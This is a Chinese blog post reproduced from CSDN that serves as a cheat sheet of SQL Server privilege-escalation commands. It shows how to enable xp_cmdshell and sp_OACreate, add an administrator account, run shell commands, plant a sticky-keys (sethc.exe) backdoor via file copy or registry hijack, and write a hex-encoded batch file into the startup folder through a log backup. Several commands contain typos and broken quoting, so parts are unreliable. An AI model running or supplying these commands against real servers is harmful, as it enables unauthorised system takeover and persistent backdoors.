0X01 常见方式

0X02 常用提权语句
1、查看数据库版本
select @@version
2、查看数据库系统参数
exec master..xp_msver;
3、查看用户所属角色信息
sp_helpsrvrolemember
4、查看当前数据库
select db_name()
5、显示机器上的驱动器
xp_availablemedia
6、查看当前账户权限
select IS_SRVROLEMEMBER('sysadmin')
以下类似serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin
select IS_MEMBER('db owner')
7、添加用户
exec master..dbo.sp_addlogin test,password #添加用户
exec master..dbo.sp_addsrvrolemember test,sysadmin #加权限
8、启动停止服务
exec master..xp_servicecontrol 'stop','test'
exec master..xp_servicecontrol 'start','test'
9、检查功能
SELECT count(*) FROM master..dbo.sysobjects WHERE name='xp_cmdshell'
xp_cmdshell、xp_regread、sp_makewebtask、xp_subdirs、xp_dirtree、sp_addextendedproc

 

0X03 XP_cmdshell 提权方式
1、开启xp_cmdshell存储过程
EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;RECONFAGURE；
2、关闭xp_cmdshell存储过程
EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
3、xp_cmdshel执行命令
exec master..xp_cmdshell 'ver'
exec master..dbo.xp_cmdshell 'net user test test/add'
exec master..dbo.xp_cmdshell 'net localgroup administrators test/add'
4、恢复xp_cmdshell
exec sp_dropextendedproc 'xp_cmdshell' dbcc addextendedproc("xp_cmdshell","xplog70.dll") OR dbcc addextendedproc("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll");

EXEC sp_configure 'show advanced options',0 --

 

0X04 sp_OACreate提权方式
1、开启sp_OACreate
exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
2、关闭sp_OACreate
exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
3、禁用advanced options
EXEC sp_configure 'show advanced options',0;GO RECONFIGURE WITH OVERRIDE;
4、sp_OACreate执行命令
DECLARE @js int
EXEC sp_OACreate 'ScriptControl',@js OUT
EXEC sp_OASetProperty @js,'Language,JavaScript'
EXEC sp_OAMethod @js,'Eval,NULL,war o=new ActiveXObject("Shell.Users");z=o.create("user"),z.changePassword("pass","");z.setting("AccountType")=3;
5、sp_OACreate移动文件
declare @aa int
exec sp_oacreate 'scripting.filesystemobject',@@aa out
exec sp_oamethod @aa,'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';
6、sp_OACreate复制文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile,null,'c:\windows\explorerexe','c:\windows\system32\sethc.exe';
7、sp_OACreate删除文件
DECLARE @Result int
DECLARE @FSO_Token int
EXEC @Result =sp_OACreate'Scripting.FileSystemObject',@FSO_Token OUTPUT
EXEC @Result =sp_OAMethod @FSO_Token,'DeleteFile',NULL,'C:\Documents and Settings\All Users\[开始]菜\程序启动\user.bat'
EXEC @Result =Sp_OADestroy @FSO_Token
8、wscript.shell执行命令
use master;
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'
9、Shell.Application执行命令
declare @o int;
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute,null,'cmd.exe','cmd /c net user > c:\test.txt','c:\windows\system32',",'1';
or
exec sp_oamethod @o, 'ShellExecute,null,'user.vbs',",'c:\',",'1';
10、sp_oacreate替换粘贴键
declare @o int;
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile,null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';

 

0X05 沙盒执行命令
1、openrowset开启
exec sp_configure ‘show advanced options’,1;RECONFIGURE;

exec sp_configure ‘Ad Hoc Distributed Queries’,1;RECONFIGURE;
2、openrowset关闭
exec sp_configure 'show advanced option,1;RECONFIGURE;

exec sp configure ‘Ad Hoc Distributed Queries’,0;RECONFIGURE;
3、沙盒执行命令
exec master…xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.O\Engines’,‘SandBoxMode’,‘REG_DWORD’,1
select * from openrowset(‘microsoft,jet.oledb.4.0’,’;database=c:\windows\system32\ias.mdb’,select shell(“cmd.exe /c echo a>c:\b.txt”)’)

0X06 注册表篡改
1、注册表劫持粘贴键
exec master…xp_regwrite ‘HKEY_LOCAL MACHINE’,‘SOFTWARE\Microsoft\WindowsNT\CurrentVersion\lmage File Execution Options\sethc.EXE’,‘Debugger’,‘REG_SZ’,‘C:\WINDOWS\explorer.exe’;

0X07 总结
sa权限下
1、存在xp_cmdshell时
使用xp_cmdshel执行命令添加用户，当出现错误可以恢复和开启xp_cmdshell
2、xp_cmdshell无法使用时
使用sp_OACreate执行命令，同样当出现错误可以恢复和开启
3、当执行命令无法使用时可以用沙盒提权
使用xp_regwrite和 openrowset
4、当只有xp_regwrite可用时可以劫持粘贴键（sethc.exe）
使用xp_regwrite修改注册表

dbowner权限下
1、通过备份文件到启动项提权
alter database [northwind] set RECOVERY FULL–
create table cmd (a image)–
backup log[northwind]to disk=‘c\cmd1’ with init–
insert into cmd (a) values(0×130A0DOA404563686F206F66660D0A406364202577696E646972250D0A4064656C20646972202F73202F612073657468632E6578650D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C73657468632E657865202F790D0A40636F7079202577696E646972255C73797374656D33325C636D642E657865202577696E646972255C73797374656D33325C646C6C63616368655C73657468632E657865202F790DOA)–
backup log [northwind] to disk=‘C:\Documents and Settings\Administrator[开始]菜\程序启动\start.bat’–
drop table cmd–
————————————————
版权声明：本文为CSDN博主「逐梦_Fighter」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/qq_37286368/article/details/107047907